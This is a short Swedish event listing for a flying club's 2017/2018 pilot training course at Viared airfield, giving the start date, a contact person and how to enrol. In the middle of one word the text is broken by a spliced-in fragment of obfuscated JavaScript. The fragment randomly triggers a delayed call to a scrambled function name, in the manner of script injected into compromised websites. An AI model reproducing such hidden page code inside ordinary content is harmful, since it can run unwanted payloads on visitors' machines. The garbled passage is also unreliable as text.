Start pilotutbildning 2017/2018

När: Tillbaka till kalendern » 2017-10-11 @ 18:30 - 21:30
Var: Viared Flygplats
Kontakt: Thomas Kolb
0762-138 131
thomas.kolb@comhem.se

Vi kom­mer att påbörja en utbild­ning av nya pilo­ter med bör­jan den 11:e oktober.

Oav­sett om du ald­rig har sut­tit i ett flyg­plan förut, eller om du redan har haft cer­ti­fi­kat tidi­gare — vill du bli pilot, så har du chan­sen nu! Det finns fort­farandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande en eller två plat­ser kvar, så du är hjärt­ligt väl­kom­men att hänga på!

Slå en sig­nal till kurs­le­da­ren (0762–138 131), eller anmäl dig direkt via Stu­di­e­för­bun­det Vux­en­sko­lan!

Läs mer om utbild­ningen här!